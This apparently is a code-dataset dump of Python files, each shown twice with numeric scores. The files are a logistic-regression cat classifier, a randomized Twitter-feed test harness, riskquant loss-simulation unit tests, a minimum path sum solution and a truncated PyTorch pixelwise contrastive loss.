import matplotlib import numpy as np import matplotlib.pyplot as plt import h5py import scipy from PIL import Image from scipy import ndimage def load_dataset(): train_dataset = h5py.File('train_catvnoncat.h5', "r") train_set_x_orig = np.array(train_dataset["train_set_x"][:]) # your train set features train_set_y_orig = np.array(train_dataset["train_set_y"][:]) # your train set labels test_dataset = h5py.File('test_catvnoncat.h5', "r") test_set_x_orig = np.array(test_dataset["test_set_x"][:]) # your test set features test_set_y_orig = np.array(test_dataset["test_set_y"][:]) # your test set labels classes = np.array(test_dataset["list_classes"][:]) # the list of classes train_set_y_orig = train_set_y_orig.reshape((1, train_set_y_orig.shape[0])) test_set_y_orig = test_set_y_orig.reshape((1, test_set_y_orig.shape[0])) return train_set_x_orig, train_set_y_orig, test_set_x_orig, test_set_y_orig, classes train_set_x_orig, train_set_y, test_set_x_orig, test_set_y, classes = load_dataset() m_train = train_set_x_orig.shape[0] m_test = test_set_x_orig.shape[0] num_px = train_set_x_orig[0].shape[0] # Reshape the training and test examples train_set_x_flatten = train_set_x_orig.reshape(train_set_x_orig.shape[0],-1).T test_set_x_flatten = test_set_x_orig.reshape(test_set_x_orig.shape[0],-1).T print ("train_set_x_flatten shape: " + str(train_set_x_flatten.shape)) print ("train_set_y shape: " + str(train_set_y.shape)) print ("test_set_x_flatten shape: " + str(test_set_x_flatten.shape)) print ("test_set_y shape: " + str(test_set_y.shape)) print ("sanity check after reshaping: " + str(train_set_x_flatten[0:5,0])) train_set_x = train_set_x_flatten/255. test_set_x = test_set_x_flatten/255. def sigmoid(z): s = 1 / (1 + np.exp(-z)) return s def initialize_with_zeros(dim): w = np.zeros((dim, 1)) b = 0 assert (w.shape == (dim, 1)) assert (isinstance(b, float) or isinstance(b, int)) return w, b def propagate(w, b, X, Y): m = X.shape[1] A = sigmoid(np.dot(w.T, X) + b) # compute activation cost = (- 1 / m) * np.sum(Y * np.log(A) + (1 - Y) * (np.log(1 - A))) # compute cost dw = (1 / m) * np.dot(X, (A - Y).T) db = (1 / m) * np.sum(A - Y) assert (dw.shape == w.shape) assert (db.dtype == float) cost = np.squeeze(cost) assert (cost.shape == ()) grads = {"dw": dw, "db": db} return grads, cost def optimize(w, b, X, Y, num_iterations, learning_rate, print_cost=False): costs = [] for i in range(num_iterations): # Cost and gradient calculation grads, cost = propagate(w, b, X, Y) # Retrieve derivatives from grads dw = grads["dw"] db = grads["db"] w = w - learning_rate * dw b = b - learning_rate * db # Record the costs if i % 100 == 0: costs.append(cost) if print_cost and i % 100 == 0: print("Cost after iteration %i: %f" % (i, cost)) params = {"w": w, "b": b} grads = {"dw": dw, "db": db} return params, grads, costs def predict(w, b, X): m = X.shape[1] Y_prediction = np.zeros((1, m)) w = w.reshape(X.shape[0], 1) A = sigmoid(np.dot(w.T, X) + b) for i in range(A.shape[1]): # Convert probabilities A[0,i] to actual predictions p[0,i] if (A[0][i] > 0.5): Y_prediction[0][i] = 1 else: Y_prediction[0][i] = 0 assert (Y_prediction.shape == (1, m)) return Y_prediction def model(X_train, Y_train, X_test, Y_test, num_iterations=2000, learning_rate=0.5, print_cost=False): """ Builds the logistic regression model by calling the function you've implemented previously Arguments: X_train -- training set represented by a numpy array of shape (num_px * num_px * 3, m_train) Y_train -- training labels represented by a numpy array (vector) of shape (1, m_train) X_test -- test set represented by a numpy array of shape (num_px * num_px * 3, m_test) Y_test -- test labels represented by a numpy array (vector) of shape (1, m_test) num_iterations -- hyperparameter representing the number of iterations to optimize the parameters learning_rate -- hyperparameter representing the learning rate used in the update rule of optimize() print_cost -- Set to true to print the cost every 100 iterations Returns: d -- dictionary containing information about the model. """ # initialize parameters with zeros w, b = initialize_with_zeros(X_train.shape[0]) # Gradient descent parameters, grads, costs = optimize(w, b, X_train, Y_train, num_iterations, learning_rate, print_cost) # Retrieve parameters w and b from dictionary "parameters" w = parameters["w"] b = parameters["b"] # Predict test/train set examples Y_prediction_test = predict(w, b, X_test) Y_prediction_train = predict(w, b, X_train) # Print train/test Errors print("train accuracy: {} %".format(100 - np.mean(np.abs(Y_prediction_train - Y_train)) * 100)) print("test accuracy: {} %".format(100 - np.mean(np.abs(Y_prediction_test - Y_test)) * 100)) d = {"costs": costs, "Y_prediction_test": Y_prediction_test, "Y_prediction_train": Y_prediction_train, "w": w, "b": b, "learning_rate": learning_rate, "num_iterations": num_iterations} return d d = model(train_set_x, train_set_y, test_set_x, test_set_y, num_iterations = 2000, learning_rate = 0.005, print_cost = True) # Plot learning curve (with costs) costs = np.squeeze(d['costs']) plt.plot(costs) plt.ylabel('cost') plt.xlabel('iterations (per hundreds)') plt.title("Learning rate =" + str(d["learning_rate"])) plt.show() #(PUT YOUR IMAGE NAME) my_image = "my_image.jpg" # change this to the name of your image file fname = my_image image = np.array(matplotlib.pyplot.imread(fname)) my_image = np.array(Image.fromarray(image).resize((num_px,num_px))).reshape((1, num_px*num_px*3)).T my_image = my_image/255 my_predicted_image = predict(d["w"], d["b"], my_image) plt.imshow(image) print("y = " + str(np.squeeze(my_predicted_image)) + ", Algorithm predicts a \"" + classes[int(np.squeeze(my_predicted_image)),].decode("utf-8") + "\" picture.")
LR.py
import matplotlib import numpy as np import matplotlib.pyplot as plt import h5py import scipy from PIL import Image from scipy import ndimage def load_dataset(): train_dataset = h5py.File('train_catvnoncat.h5', "r") train_set_x_orig = np.array(train_dataset["train_set_x"][:]) # your train set features train_set_y_orig = np.array(train_dataset["train_set_y"][:]) # your train set labels test_dataset = h5py.File('test_catvnoncat.h5', "r") test_set_x_orig = np.array(test_dataset["test_set_x"][:]) # your test set features test_set_y_orig = np.array(test_dataset["test_set_y"][:]) # your test set labels classes = np.array(test_dataset["list_classes"][:]) # the list of classes train_set_y_orig = train_set_y_orig.reshape((1, train_set_y_orig.shape[0])) test_set_y_orig = test_set_y_orig.reshape((1, test_set_y_orig.shape[0])) return train_set_x_orig, train_set_y_orig, test_set_x_orig, test_set_y_orig, classes train_set_x_orig, train_set_y, test_set_x_orig, test_set_y, classes = load_dataset() m_train = train_set_x_orig.shape[0] m_test = test_set_x_orig.shape[0] num_px = train_set_x_orig[0].shape[0] # Reshape the training and test examples train_set_x_flatten = train_set_x_orig.reshape(train_set_x_orig.shape[0],-1).T test_set_x_flatten = test_set_x_orig.reshape(test_set_x_orig.shape[0],-1).T print ("train_set_x_flatten shape: " + str(train_set_x_flatten.shape)) print ("train_set_y shape: " + str(train_set_y.shape)) print ("test_set_x_flatten shape: " + str(test_set_x_flatten.shape)) print ("test_set_y shape: " + str(test_set_y.shape)) print ("sanity check after reshaping: " + str(train_set_x_flatten[0:5,0])) train_set_x = train_set_x_flatten/255. test_set_x = test_set_x_flatten/255. def sigmoid(z): s = 1 / (1 + np.exp(-z)) return s def initialize_with_zeros(dim): w = np.zeros((dim, 1)) b = 0 assert (w.shape == (dim, 1)) assert (isinstance(b, float) or isinstance(b, int)) return w, b def propagate(w, b, X, Y): m = X.shape[1] A = sigmoid(np.dot(w.T, X) + b) # compute activation cost = (- 1 / m) * np.sum(Y * np.log(A) + (1 - Y) * (np.log(1 - A))) # compute cost dw = (1 / m) * np.dot(X, (A - Y).T) db = (1 / m) * np.sum(A - Y) assert (dw.shape == w.shape) assert (db.dtype == float) cost = np.squeeze(cost) assert (cost.shape == ()) grads = {"dw": dw, "db": db} return grads, cost def optimize(w, b, X, Y, num_iterations, learning_rate, print_cost=False): costs = [] for i in range(num_iterations): # Cost and gradient calculation grads, cost = propagate(w, b, X, Y) # Retrieve derivatives from grads dw = grads["dw"] db = grads["db"] w = w - learning_rate * dw b = b - learning_rate * db # Record the costs if i % 100 == 0: costs.append(cost) if print_cost and i % 100 == 0: print("Cost after iteration %i: %f" % (i, cost)) params = {"w": w, "b": b} grads = {"dw": dw, "db": db} return params, grads, costs def predict(w, b, X): m = X.shape[1] Y_prediction = np.zeros((1, m)) w = w.reshape(X.shape[0], 1) A = sigmoid(np.dot(w.T, X) + b) for i in range(A.shape[1]): # Convert probabilities A[0,i] to actual predictions p[0,i] if (A[0][i] > 0.5): Y_prediction[0][i] = 1 else: Y_prediction[0][i] = 0 assert (Y_prediction.shape == (1, m)) return Y_prediction def model(X_train, Y_train, X_test, Y_test, num_iterations=2000, learning_rate=0.5, print_cost=False): """ Builds the logistic regression model by calling the function you've implemented previously Arguments: X_train -- training set represented by a numpy array of shape (num_px * num_px * 3, m_train) Y_train -- training labels represented by a numpy array (vector) of shape (1, m_train) X_test -- test set represented by a numpy array of shape (num_px * num_px * 3, m_test) Y_test -- test labels represented by a numpy array (vector) of shape (1, m_test) num_iterations -- hyperparameter representing the number of iterations to optimize the parameters learning_rate -- hyperparameter representing the learning rate used in the update rule of optimize() print_cost -- Set to true to print the cost every 100 iterations Returns: d -- dictionary containing information about the model. """ # initialize parameters with zeros w, b = initialize_with_zeros(X_train.shape[0]) # Gradient descent parameters, grads, costs = optimize(w, b, X_train, Y_train, num_iterations, learning_rate, print_cost) # Retrieve parameters w and b from dictionary "parameters" w = parameters["w"] b = parameters["b"] # Predict test/train set examples Y_prediction_test = predict(w, b, X_test) Y_prediction_train = predict(w, b, X_train) # Print train/test Errors print("train accuracy: {} %".format(100 - np.mean(np.abs(Y_prediction_train - Y_train)) * 100)) print("test accuracy: {} %".format(100 - np.mean(np.abs(Y_prediction_test - Y_test)) * 100)) d = {"costs": costs, "Y_prediction_test": Y_prediction_test, "Y_prediction_train": Y_prediction_train, "w": w, "b": b, "learning_rate": learning_rate, "num_iterations": num_iterations} return d d = model(train_set_x, train_set_y, test_set_x, test_set_y, num_iterations = 2000, learning_rate = 0.005, print_cost = True) # Plot learning curve (with costs) costs = np.squeeze(d['costs']) plt.plot(costs) plt.ylabel('cost') plt.xlabel('iterations (per hundreds)') plt.title("Learning rate =" + str(d["learning_rate"])) plt.show() #(PUT YOUR IMAGE NAME) my_image = "my_image.jpg" # change this to the name of your image file fname = my_image image = np.array(matplotlib.pyplot.imread(fname)) my_image = np.array(Image.fromarray(image).resize((num_px,num_px))).reshape((1, num_px*num_px*3)).T my_image = my_image/255 my_predicted_image = predict(d["w"], d["b"], my_image) plt.imshow(image) print("y = " + str(np.squeeze(my_predicted_image)) + ", Algorithm predicts a \"" + classes[int(np.squeeze(my_predicted_image)),].decode("utf-8") + "\" picture.")
0.505859
0.580768
BUILD_PATH = "../build/" LIBNAME = "libTwitter.so" import sys sys.path.append(BUILD_PATH) import ctypes import os ctypes.CDLL(BUILD_PATH + LIBNAME, mode=os.RTLD_LAZY) from twitwi import Twitter import json from random import randint import time class TwitterRef: def __init__(self): self.tweetMap = {} self.users = {} def postTweet(self, userId, tweetId): if userId in self.tweetMap: self.tweetMap[userId].insert(0, (tweetId, time.time())) else: self.tweetMap[userId] = [(tweetId, time.time())] def getNewsFeed(self, userId): tweets = self.tweetMap[userId][0:10] if userId in self.tweetMap else [] if userId not in self.users: return [x[0] for x in tweets ] followees = self.users[userId] if followees is None: return [x[0] for x in tweets ] for followee in followees: if followee in self.tweetMap: tweets += self.tweetMap[followee][0:10] lastTweets = sorted(tweets, key=lambda x: x[1], reverse=True)[0:10] return [x[0] for x in lastTweets ] def follow(self, followerId, followeeId): if followerId == followeeId: return if followerId in self.users and self.users[followerId] is not None: self.users[followerId].add(followeeId) else: self.users[followerId] = set() self.users[followerId].add(followeeId) def unfollow(self, followerId, followeeId): if followerId == followeeId: return if followerId in self.users: if self.users[followerId] is None: return if followeeId in self.users[followerId]: self.users[followerId].remove(followeeId) class Wrapper: def __init__(self): self.twitterRef = TwitterRef() self.twitter = Twitter() def exec(self, input): if input[0] == 3: return self.twitter.getNewsFeed(input[1]), self.twitterRef.getNewsFeed(input[1]) elif input[0] == 0: self.twitter.follow(input[1], input[2]) self.twitterRef.follow(input[1], input[2]) elif input[0] == 1: self.twitter.unfollow(input[1], input[2]) self.twitterRef.unfollow(input[1], input[2]) elif input[0] == 2: self.twitterRef.postTweet(input[1], input[2]) self.twitter.postTweet(input[1], input[2]) def generate_array(nbAction): res = [] for i in range(randint(0, nbAction)): action = randint(0, 3) if action == 3: res.append((action, randint(0, 100))) else: res.append((action, randint(0, 100), randint(0, 100))) return res def test(actions=None): wrapper = Wrapper() if actions is None: actions = generate_array(100000) with open("actions", "w") as f: json.dump(actions, f) for action in actions: if action[0] == 3: res = wrapper.exec(action) ref = res[1] tested = [elm for elm in res[0]] if ref != tested: import pdb; pdb.set_trace() assert ref == tested, (ref, tested) else: wrapper.exec(action) if __name__ == "__main__": if len(sys.argv) > 1: with open(sys.argv[1], "r") as f: actions = json.load(f) test(actions) else: test() print("All generated tests passed")
test/run.py
BUILD_PATH = "../build/" LIBNAME = "libTwitter.so" import sys sys.path.append(BUILD_PATH) import ctypes import os ctypes.CDLL(BUILD_PATH + LIBNAME, mode=os.RTLD_LAZY) from twitwi import Twitter import json from random import randint import time class TwitterRef: def __init__(self): self.tweetMap = {} self.users = {} def postTweet(self, userId, tweetId): if userId in self.tweetMap: self.tweetMap[userId].insert(0, (tweetId, time.time())) else: self.tweetMap[userId] = [(tweetId, time.time())] def getNewsFeed(self, userId): tweets = self.tweetMap[userId][0:10] if userId in self.tweetMap else [] if userId not in self.users: return [x[0] for x in tweets ] followees = self.users[userId] if followees is None: return [x[0] for x in tweets ] for followee in followees: if followee in self.tweetMap: tweets += self.tweetMap[followee][0:10] lastTweets = sorted(tweets, key=lambda x: x[1], reverse=True)[0:10] return [x[0] for x in lastTweets ] def follow(self, followerId, followeeId): if followerId == followeeId: return if followerId in self.users and self.users[followerId] is not None: self.users[followerId].add(followeeId) else: self.users[followerId] = set() self.users[followerId].add(followeeId) def unfollow(self, followerId, followeeId): if followerId == followeeId: return if followerId in self.users: if self.users[followerId] is None: return if followeeId in self.users[followerId]: self.users[followerId].remove(followeeId) class Wrapper: def __init__(self): self.twitterRef = TwitterRef() self.twitter = Twitter() def exec(self, input): if input[0] == 3: return self.twitter.getNewsFeed(input[1]), self.twitterRef.getNewsFeed(input[1]) elif input[0] == 0: self.twitter.follow(input[1], input[2]) self.twitterRef.follow(input[1], input[2]) elif input[0] == 1: self.twitter.unfollow(input[1], input[2]) self.twitterRef.unfollow(input[1], input[2]) elif input[0] == 2: self.twitterRef.postTweet(input[1], input[2]) self.twitter.postTweet(input[1], input[2]) def generate_array(nbAction): res = [] for i in range(randint(0, nbAction)): action = randint(0, 3) if action == 3: res.append((action, randint(0, 100))) else: res.append((action, randint(0, 100), randint(0, 100))) return res def test(actions=None): wrapper = Wrapper() if actions is None: actions = generate_array(100000) with open("actions", "w") as f: json.dump(actions, f) for action in actions: if action[0] == 3: res = wrapper.exec(action) ref = res[1] tested = [elm for elm in res[0]] if ref != tested: import pdb; pdb.set_trace() assert ref == tested, (ref, tested) else: wrapper.exec(action) if __name__ == "__main__": if len(sys.argv) > 1: with open(sys.argv[1], "r") as f: actions = json.load(f) test(actions) else: test() print("All generated tests passed")
0.121048
0.075858
import unittest from riskquant import loss class FixedValueModel(object): def __init__(self, value): self.value = value def draw(self, n=1): return [self.value] * n class TestLoss(unittest.TestCase): def test_simulate_losses_one_year(self): loss_model = loss.Loss(FixedValueModel(1), FixedValueModel(0.5)) single_loss = loss_model.simulate_losses_one_year() self.assertEqual([0.5], single_loss) def test_simulate_losses_one_year_multiple_loss(self): loss_model = loss.Loss(FixedValueModel(3), FixedValueModel(0.5)) single_loss = loss_model.simulate_losses_one_year() self.assertEqual([0.5, 0.5, 0.5], single_loss) def test_simulate_years(self): loss_model = loss.Loss(FixedValueModel(1), FixedValueModel(0.5)) multiple_years = loss_model.simulate_years(3) self.assertEqual([0.5, 0.5, 0.5], multiple_years) def test_simulate_years_frequency(self): loss_model = loss.Loss(FixedValueModel(2), FixedValueModel(0.5)) multiple_years = loss_model.simulate_years(3) self.assertEqual([1.0, 1.0, 1.0], multiple_years) def test_simulate_zeros(self): loss_model = loss.Loss(FixedValueModel(0), FixedValueModel(0.5)) multiple_years = loss_model.simulate_years(3) self.assertEqual([0, 0, 0], multiple_years) def testSummary(self): loss_array = [] for i in range(10): loss_model = loss.Loss(FixedValueModel(1), FixedValueModel(i)) loss_array += loss_model.simulate_years(100) loss_array += loss_model.simulate_years(10) # Add a few more for value 9 summary = loss_model.summarize_loss(loss_array) self.assertEqual(summary['minimum'], 0) self.assertEqual(summary['tenth_percentile'], 1) self.assertEqual(summary['mode'], 9) self.assertEqual(summary['median'], 5) self.assertEqual(summary['ninetieth_percentile'], 9) self.assertEqual(summary['maximum'], 9) if __name__ == '__main__': unittest.main()
tests/test_loss.py
import unittest from riskquant import loss class FixedValueModel(object): def __init__(self, value): self.value = value def draw(self, n=1): return [self.value] * n class TestLoss(unittest.TestCase): def test_simulate_losses_one_year(self): loss_model = loss.Loss(FixedValueModel(1), FixedValueModel(0.5)) single_loss = loss_model.simulate_losses_one_year() self.assertEqual([0.5], single_loss) def test_simulate_losses_one_year_multiple_loss(self): loss_model = loss.Loss(FixedValueModel(3), FixedValueModel(0.5)) single_loss = loss_model.simulate_losses_one_year() self.assertEqual([0.5, 0.5, 0.5], single_loss) def test_simulate_years(self): loss_model = loss.Loss(FixedValueModel(1), FixedValueModel(0.5)) multiple_years = loss_model.simulate_years(3) self.assertEqual([0.5, 0.5, 0.5], multiple_years) def test_simulate_years_frequency(self): loss_model = loss.Loss(FixedValueModel(2), FixedValueModel(0.5)) multiple_years = loss_model.simulate_years(3) self.assertEqual([1.0, 1.0, 1.0], multiple_years) def test_simulate_zeros(self): loss_model = loss.Loss(FixedValueModel(0), FixedValueModel(0.5)) multiple_years = loss_model.simulate_years(3) self.assertEqual([0, 0, 0], multiple_years) def testSummary(self): loss_array = [] for i in range(10): loss_model = loss.Loss(FixedValueModel(1), FixedValueModel(i)) loss_array += loss_model.simulate_years(100) loss_array += loss_model.simulate_years(10) # Add a few more for value 9 summary = loss_model.summarize_loss(loss_array) self.assertEqual(summary['minimum'], 0) self.assertEqual(summary['tenth_percentile'], 1) self.assertEqual(summary['mode'], 9) self.assertEqual(summary['median'], 5) self.assertEqual(summary['ninetieth_percentile'], 9) self.assertEqual(summary['maximum'], 9) if __name__ == '__main__': unittest.main()
0.810779
0.625638
class ShortestWay: @classmethod def find_shortest_way_1(cls, arr): if arr is None or len(arr) == 0: return 0 my_arr = list() row_count = len(arr) col_count = len(arr[0]) for row in arr: my_arr.append([0 for _ in row]) for i in range(col_count): if i == 0: my_arr[0][i] = arr[0][i] else: my_arr[0][i] = arr[0][i] + my_arr[0][i-1] for i in range(row_count): if i == 0: continue else: my_arr[i][0] = arr[i][0] + my_arr[i-1][0] for row in range(1, row_count): for col in range(1, col_count): my_arr[row][col] = min((my_arr[row-1][col], my_arr[row][col-1])) + arr[row][col] return my_arr[row_count-1][col_count-1] @classmethod def find_shortest_way_2(cls, arr): if arr is None or len(arr) == 0: return 0 my_arr = list() row_count = len(arr) col_count = len(arr[0]) length = min([row_count, col_count]) for _ in range(length): my_arr.append(0) if row_count > col_count: for i in range(row_count): for j in range(col_count): if i == 0 and j == 0: my_arr[j] = arr[0][0] else: if i == 0: my_arr[j] = my_arr[j-1] + arr[0][j] else: if j != 0: my_arr[j] = min([my_arr[j-1], my_arr[j]]) + arr[i][j] else: my_arr[j] = arr[i][j] + my_arr[j] if row_count <= col_count: for i in range(col_count): for j in range(row_count): if i == 0 and j == 0: my_arr[j] = arr[0][0] else: if i == 0: my_arr[j] = my_arr[j-1] + arr[j][0] else: if j != 0: my_arr[j] = min([my_arr[j-1], my_arr[j]]) + arr[j][i] else: my_arr[j] = arr[j][i] + my_arr[j] return my_arr[-1] if __name__ == '__main__': m = [ [1, 3, 5, 9], [8, 1, 3, 4], [5, 0, 6, 1], [8, 8, 4, 0] ] print(ShortestWay.find_shortest_way_1(m)) print(ShortestWay.find_shortest_way_2(m))
dp/q2.py
class ShortestWay: @classmethod def find_shortest_way_1(cls, arr): if arr is None or len(arr) == 0: return 0 my_arr = list() row_count = len(arr) col_count = len(arr[0]) for row in arr: my_arr.append([0 for _ in row]) for i in range(col_count): if i == 0: my_arr[0][i] = arr[0][i] else: my_arr[0][i] = arr[0][i] + my_arr[0][i-1] for i in range(row_count): if i == 0: continue else: my_arr[i][0] = arr[i][0] + my_arr[i-1][0] for row in range(1, row_count): for col in range(1, col_count): my_arr[row][col] = min((my_arr[row-1][col], my_arr[row][col-1])) + arr[row][col] return my_arr[row_count-1][col_count-1] @classmethod def find_shortest_way_2(cls, arr): if arr is None or len(arr) == 0: return 0 my_arr = list() row_count = len(arr) col_count = len(arr[0]) length = min([row_count, col_count]) for _ in range(length): my_arr.append(0) if row_count > col_count: for i in range(row_count): for j in range(col_count): if i == 0 and j == 0: my_arr[j] = arr[0][0] else: if i == 0: my_arr[j] = my_arr[j-1] + arr[0][j] else: if j != 0: my_arr[j] = min([my_arr[j-1], my_arr[j]]) + arr[i][j] else: my_arr[j] = arr[i][j] + my_arr[j] if row_count <= col_count: for i in range(col_count): for j in range(row_count): if i == 0 and j == 0: my_arr[j] = arr[0][0] else: if i == 0: my_arr[j] = my_arr[j-1] + arr[j][0] else: if j != 0: my_arr[j] = min([my_arr[j-1], my_arr[j]]) + arr[j][i] else: my_arr[j] = arr[j][i] + my_arr[j] return my_arr[-1] if __name__ == '__main__': m = [ [1, 3, 5, 9], [8, 1, 3, 4], [5, 0, 6, 1], [8, 8, 4, 0] ] print(ShortestWay.find_shortest_way_1(m)) print(ShortestWay.find_shortest_way_2(m))
0.276105
0.310498
import numpy as np import matplotlib.pyplot as plt import torch import torch.nn.functional as F import torchvision.transforms as T from kornia.feature.hardnet import HardNet8 from kornia.feature.tfeat import TFeat from kornia.morphology import erosion from kornia.filters import laplacian from src.models.hog_layer import HoGLayer def get_representation(keypoint_coordinates: torch.Tensor, image: torch.Tensor, feature_map: torch.Tensor) -> (torch.Tensor, torch.Tensor): """ :param keypoint_coordinates: Tensor of key-point coordinates in (N, 2/3) :param image: Tensor of current image in (N, C, H, W) :param feature_map: Tensor of feature map for key-point in (N, H', W') :return: """ N, C, H, W = image.shape # Feature maps are converted to 0-1 masks given a threshold alpha = 0.5 mask = torch.round(feature_map).unsqueeze(1).to(image.device) # (N, H', W'), rounds to the closest integer # Use erosion iteratively intensities = [] erosion_kernel = torch.ones(size=(3, 3)).to(image.device) _img = mask count = 0 while True: _morphed = erosion(_img, kernel=erosion_kernel, engine='convolution') _morphed = F.interpolate(input=_morphed, size=(H, W)) _img = torch.mul(_morphed, image) if count == 0: laplacian_img = laplacian(input=_img, kernel_size=3) laplacian_sum = laplacian_img.sum(dim=(1, 2, 3)) count += 1 intensity = _img.sum(dim=(1, 2, 3)) intensities.append(intensity) if - 1e-3 <= intensity.mean() <= 1e-3: break features = torch.empty(size=(image.shape[0], 5)).to(image.device) for n in range(image.shape[0]): features[n, ...] = torch.tensor([ keypoint_coordinates[n, 0], keypoint_coordinates[n, 1], intensities[-1][n], intensities[-2][n] if len(intensities) >= 2 else intensities[-1][n], intensities[-3][n] if len(intensities) >= 3 else intensities[-1][n] ]) return features, laplacian_sum def pixelwise_contrastive_loss(keypoint_coordinates: torch.Tensor, image_sequence: torch.Tensor, feature_map_seq: torch.Tensor, time_window: int = 3, alpha: float = 0.1, verbose: bool = False) -> torch.Tensor: """ Encourages key-points to represent different patches of the input image. :param keypoint_coordinates: Tensor of key-point coordinates in (N, T, K, 2/3) :param image_sequence: Tensor of image sequence in (N, T, C, H, W) :param feature_map_seq: Tensor of feature maps per key-point in (N, T, K, H', W') :param time_window: Amount of time-steps for positive/negative matching :param alpha: Margin for matches vs. non-matches :param verbose: Set true for additional output prints :return: Tensor of average loss """ assert keypoint_coordinates.dim() == 4 assert image_sequence.dim() == 5 assert keypoint_coordinates.shape[0:2] == image_sequence.shape[0:2] assert time_window <= image_sequence.shape[1] N, T, C, H, W = image_sequence.shape K = keypoint_coordinates.shape[2] pos_range = max(int(time_window / 2), 1) if time_window > 1 else 0 # Calculate loss per time-step per key-points # The features are extracted and their ids (time-step, # key-point) saved to a list to look them up again if needed features = torch.empty(size=(N, T, K, 5)).to(image_sequence.device) laplacian_sums = torch.empty(size=(N, T, K, 1)).to(image_sequence.device) feature_ids = [] total_loss = torch.zeros(size=(N,)).to(image_sequence.device) # total_loss.requires_grad_(True) for t in range(0, T): loss_per_timestep = torch.zeros(size=(N,)).to(image_sequence.device) # loss_per_timestep.requires_grad_(True) for k in range(0, K): """ Anchor patch """ matches = [(t_i, k) for t_i in range(max(t - pos_range, 0), min(t + pos_range + 1, T))] if time_window > 1 else [] matches.remove((t, k)) non_matches = [(t_j, k_j) for t_j in range(max(t - pos_range, 0), min(t + pos_range + 1, T)) for k_j in range(0, K) if k_j != k] # Anchor patch if (t, k) in feature_ids: anchor_ft = features[:, t, k, ...] anchor_laplacian_sum = laplacian_sums[:, t, k, ...].squeeze(1) else: anchor_ft, anchor_laplacian_sum = get_representation( keypoint_coordinates=keypoint_coordinates[:, t, k, ...], image=image_sequence[:, t, ...], feature_map=feature_map_seq[:, t, k, ...]) features[:, t, k, ...] = anchor_ft laplacian_sums[:, t, k, ...] = anchor_laplacian_sum.unsqueeze(-1) feature_ids.append((t, k)) """ Match (positive) patches """ L_match = torch.zeros(size=(N,)).to(image_sequence.device) # L_match.requires_grad_(True) for t_i, k_i in matches: if (t_i, k_i) in feature_ids: #print('selected') match_ft = features[:, t_i, k_i, ...] match_laplacian_sum = laplacian_sums[:, t_i, k_i, ...].squeeze(1) else: #print('calculated') match_ft, match_laplacian_sum = get_representation( keypoint_coordinates=keypoint_coordinates[:, t_i, k_i, ...], image=image_sequence[:, t_i, ...], feature_map=feature_map_seq[:, t_i, k_i, ...]) features[:, t_i, k_i, ...] = match_ft laplacian_sums[:, t_i, k_i, ...] = match_laplacian_sum.unsqueeze(-1) feature_ids.append((t_i, k_i)) L_match = L_match + torch.mul( L_match + torch.norm(anchor_ft - match_ft, dim=1, p=2), torch.abs(anchor_laplacian_sum - match_laplacian_sum)) L_match = L_match / len(matches) """ Non-match (negative) patches """ L_non_match = torch.zeros(size=(N,)).to(image_sequence.device) # L_non_match.requires_grad_(True) for t_j, k_j in non_matches: if (t_j, k_j) in feature_ids: #print('selected') non_match_ft = features[:, t_j, k_j, ...] non_match_laplacian_sum = laplacian_sums[:, t_j, k_j, ...].squeeze(1) else: #print('calculated') non_match_ft, non_match_laplacian_sum = get_representation( keypoint_coordinates=keypoint_coordinates[:, t_j, k_j, ...], image=image_sequence[:, t_j, ...], feature_map=feature_map_seq[:, t_j, k_j, ...]) features[:, t_j, k_j, ...] = non_match_ft laplacian_sums[:, t_j, k_j, ...] = non_match_laplacian_sum.unsqueeze(-1) feature_ids.append((t_j, k_j)) L_non_match = L_non_match + torch.mul( torch.norm(anchor_ft - non_match_ft, dim=1, p=2), torch.abs(anchor_laplacian_sum - non_match_laplacian_sum)) L_non_match = L_non_match / len(non_matches) loss_per_timestep = loss_per_timestep + \ torch.maximum(L_match - L_non_match + alpha, torch.zeros(size=(N,)).to(image_sequence.device)) loss_per_timestep = torch.div(loss_per_timestep, (K * (time_window * K - 1))) total_loss = total_loss + loss_per_timestep # Average across batch return torch.mean(total_loss, dim=0)
src/losses/pixelwise_contrastive_loss_2.py
import numpy as np import matplotlib.pyplot as plt import torch import torch.nn.functional as F import torchvision.transforms as T from kornia.feature.hardnet import HardNet8 from kornia.feature.tfeat import TFeat from kornia.morphology import erosion from kornia.filters import laplacian from src.models.hog_layer import HoGLayer def get_representation(keypoint_coordinates: torch.Tensor, image: torch.Tensor, feature_map: torch.Tensor) -> (torch.Tensor, torch.Tensor): """ :param keypoint_coordinates: Tensor of key-point coordinates in (N, 2/3) :param image: Tensor of current image in (N, C, H, W) :param feature_map: Tensor of feature map for key-point in (N, H', W') :return: """ N, C, H, W = image.shape # Feature maps are converted to 0-1 masks given a threshold alpha = 0.5 mask = torch.round(feature_map).unsqueeze(1).to(image.device) # (N, H', W'), rounds to the closest integer # Use erosion iteratively intensities = [] erosion_kernel = torch.ones(size=(3, 3)).to(image.device) _img = mask count = 0 while True: _morphed = erosion(_img, kernel=erosion_kernel, engine='convolution') _morphed = F.interpolate(input=_morphed, size=(H, W)) _img = torch.mul(_morphed, image) if count == 0: laplacian_img = laplacian(input=_img, kernel_size=3) laplacian_sum = laplacian_img.sum(dim=(1, 2, 3)) count += 1 intensity = _img.sum(dim=(1, 2, 3)) intensities.append(intensity) if - 1e-3 <= intensity.mean() <= 1e-3: break features = torch.empty(size=(image.shape[0], 5)).to(image.device) for n in range(image.shape[0]): features[n, ...] = torch.tensor([ keypoint_coordinates[n, 0], keypoint_coordinates[n, 1], intensities[-1][n], intensities[-2][n] if len(intensities) >= 2 else intensities[-1][n], intensities[-3][n] if len(intensities) >= 3 else intensities[-1][n] ]) return features, laplacian_sum def pixelwise_contrastive_loss(keypoint_coordinates: torch.Tensor, image_sequence: torch.Tensor, feature_map_seq: torch.Tensor, time_window: int = 3, alpha: float = 0.1, verbose: bool = False) -> torch.Tensor: """ Encourages key-points to represent different patches of the input image. :param keypoint_coordinates: Tensor of key-point coordinates in (N, T, K, 2/3) :param image_sequence: Tensor of image sequence in (N, T, C, H, W) :param feature_map_seq: Tensor of feature maps per key-point in (N, T, K, H', W') :param time_window: Amount of time-steps for positive/negative matching :param alpha: Margin for matches vs. non-matches :param verbose: Set true for additional output prints :return: Tensor of average loss """ assert keypoint_coordinates.dim() == 4 assert image_sequence.dim() == 5 assert keypoint_coordinates.shape[0:2] == image_sequence.shape[0:2] assert time_window <= image_sequence.shape[1] N, T, C, H, W = image_sequence.shape K = keypoint_coordinates.shape[2] pos_range = max(int(time_window / 2), 1) if time_window > 1 else 0 # Calculate loss per time-step per key-points # The features are extracted and their ids (time-step, # key-point) saved to a list to look them up again if needed features = torch.empty(size=(N, T, K, 